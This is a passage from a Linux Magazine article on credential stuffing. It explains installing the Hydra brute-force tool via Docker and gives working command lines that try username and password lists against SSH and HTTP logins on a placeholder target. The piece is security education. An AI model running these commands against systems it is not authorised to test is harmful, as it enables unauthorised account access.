Understanding and preventing credential stuffing attacks

Getting Your Hands Dirtier

In addition to harvesting lists of passwords and hunting for relevant usernames for credential stuffing on the command line, you need to consider the automation behind such attacks. Unsurprisingly, there are multiple automation tools.

One such tool, Hydra (sometimes called THC Hydra), is part of the Kali Linux suite of tools and available in Van Hauser's repository [10] on GitHub. The efficient Hydra supports operating with parallel connections. Note the reminder in the README file [11]: "This Tool Is for Legal Purposes Only!"

Although I've only really talked about web services so far, Hydra purportedly supports a significant number of protocols as mentioned in the README file (see Table 1).

Table 1

Hydra Supported Protocols and Services

Asterisk

ICQ

Rlogin

AFP

IMAP

Rsh

Cisco AAA

IRC

RTSP

Cisco auth

LDAP

SAP/R3

Cisco enable

MEMCACHED

SIP

CVS

MONGODB

SMB

Firebird

MS-SQL

SMTP

FTP

MYSQL

SMTP Enum

HTTP-FORM-GET

NCP

SNMP v1+v2+v3

HTTP-FORM-POST

NNTP

SOCKS5

HTTP-GET

Oracle Listener

SSH (v1 and v2)

HTTP-HEAD

Oracle SID

SSHKEY

HTTP-POST

Oracle

Subversion

HTTP-PROXY

PC-Anywhere

Teamspeak (TS2)

HTTPS-FORM-GET

PCNFS

Telnet

HTTPS-FORM-POST

POP3

VMware-Auth

HTTPS-GET

POSTGRES

VNC

HTTPS-HEAD

Radmin

XMPP

HTTPS-POST

RDP

HTTP-Proxy

Rexec

A quick word of warning: Hydra can take a few attempts to get the command-line options right, so I recommend practicing on a Capture the Flag server or a service where you know the credentials in case you come across problems. I like to save successful command-line options for later.

There are a few ways to install Hydra (see the README [11] for more information). I will purposely cover generic commands. If you want to run these commands using the developer's preferred installation route with Docker, see the "Using Docker with Hydra" box. I think Docker is preferred because it guarantees you are using the latest version.

Using Docker with Hydra

For the Docker installation route, you will need to make some tweaks to the generic commands used in this article. If you use local files on a laptop for usernames and passwords lists, then you need to mount the local directory into the Docker container. You also need to prepend some Docker commands to the Hydra commands.

An example of a Docker command would look as follows:

$ docker run -it vanhauser/hydra -v -L /home/chris/users.txt -P /home/chris/passwords.txt -s22 -t4 -I target.tld ssh

However, the above command won't work until you mount a volume. To do that, you need to convert the above Hydra SSH command to mount local files to a container as follows:

$ docker run -it --mount type=bind,source="/home/chris"/,target=/tmp,readonly vanhauser/hydra -L /tmp/users.txt -P /tmp/passwords.txt -s22 -t4 -I target.tld ssh

Admittedly, there is a lot going on in the above command, so I'll break it down into sections. At the start, I prepend the docker run command and then mount the volume (read only) from /home/chris locally to /tmp inside the container. I then point Docker at the vanhauser/hydra container image and tell Hydra to look in the /tmp directory for both the usernames and passwords files before offering a target host and asking Hydra to use SSH logins.

If you are new to Docker, it may take a couple of attempts to tweak the generic commands, but it's not too difficult to transpose the other commands in this article using the examples shown here.

To use Hydra, I need to install Docker, log into Docker Hub [12], and then create a token to pull from the vanhauser/hydra repository on Docker Hub. On Debian Linux derivatives, such as Ubuntu, you can get started with the following command:

$ apt update; apt install -y docker.io

Next you need to create a personal access token as shown in Figure 3. To get there, either log in or create a Docker Hub account and then click on Account Settings (top right) followed by Security (left).

Figure 3: Create a personal access token on Docker Hub.

Once you click on the blue New Access Token button (and choose read-only access), as shown in Figure 3, you're all set. (If you need additional help in setting up an access token, see [13]). Using this access token as the password, you can log into Docker Hub on the command line and see if your access token works as follows:

$ docker login -u chrisbinnie # change your Docker Hub username
Password: <enter Personal Access Token here>

Warning: Your password will be stored unencrypted in /root/.docker/config.json. Configure a credential helper to remove this warning (see [14]).

Login Success

Now that you have access to Docker Hub (public) images, you can pull Hydra's image with the code in Listing 2.

Listing 2

Pulling the Hydra Image

01 $ docker pull vanhauser/hydra
02 Using default tag: latest
03 latest: Pulling from vanhauser/hydra
04 90ac1ecaf92c: Pull complete
05 be7c66840ebb: Pull complete
06 <...snip?>
07
08 $ docker images
09 REPOSITORY        TAG       IMAGE ID       CREATED      SIZE
10 vanhauser/hydra   latest    d89f1bd1e06f   6 days ago   1.24GB

The docker images command confirms that you have pulled around one and a quarter gigabytes for Hydra. In order to check that the image is valid, you can open Hydra's help page with the following command:

$ docker run -it vanhauser/hydra -h

As the heavily abbreviated help page in Listing 3 shows, Hydra is ready to use. Note the authors' request in Listing 3: "Please do not use in military or secret service organizations, or for illegal purposes."

Listing 3

Hydra Help Page

Hydra v9.6dev (c) 2023 by van Hauser/THC & David Maciejak -- Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -r        use a non-random shuffling method for option -x
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
<...snip?>

Always Make Lists

As my first credential stuffing example using Hydra, I will target an SSH server. The syntax is simple and easy to follow (remember to refer to the "Using Docker with Hydra" box to use Docker with these commands). I start by using a local list (in the current directory) of passwords (in a file called passwords.txt) and just one username with a lowercase -l option as follows:

$ hydra -v -l chris -P passwords.txt -s22 -t4 -I target.tld ssh

Bear in mind that the server may lock a user out after three attempts so focusing on one username isn't the ideal approach. Instead, you can collect a list of usernames and then save them into a file, with the uppercase -L option, with full file paths as follows:

$ hydra -v -L /home/chris/users.txt -P /home/chris/passwords.txt -s22 -t4 -I target.tld ssh

That's all you need for attacking SSH servers. If you want to attack a web application, then you would need to append http-get at the end and add -s for HTTP's port 80 (I will explain -t shortly) as follows:

$ hydra -v -L /home/chris/users.txt -P /home/chris/passwords.txt -s80 -t4 -I target.tld http-get

Buy this article as PDF

Express-Checkout as PDF
Price $2.95
(incl. VAT)

Buy Linux Magazine

SINGLE ISSUES
 
SUBSCRIPTIONS
 
TABLET & SMARTPHONE APPS
Get it on Google Play

US / Canada

Get it on Google Play

UK / Australia

Related content

  • Attacking SSH

    Sometimes the only way to break into an SSH server is through brute force – and yes, there are tools for that.

  • ShellHub

    ShellHub offers an innovative approach to remote access with minimal reconfiguration of a firewall.

  • Password Tools

    Create secure passwords with the help of a password generator and check for quality at the same time.

  • Defending WordPress with WPScan

    The number of potential WordPress vulnerabilities is stunning. WPScan scans your site to find the problems that could lead to compromise.

  • Secure Online Passwords

    Securely storing passwords online can be a complex task. With a few tools, websites can offer better security, but users still need to choose their passwords wisely.

comments powered by Disqus
Subscribe to our Linux Newsletters
Find Linux and Open Source Jobs
Subscribe to our ADMIN Newsletters

Support Our Work

Linux Magazine content is made possible with support from readers like you. Please consider contributing when you’ve found an article to be beneficial.

Learn More

News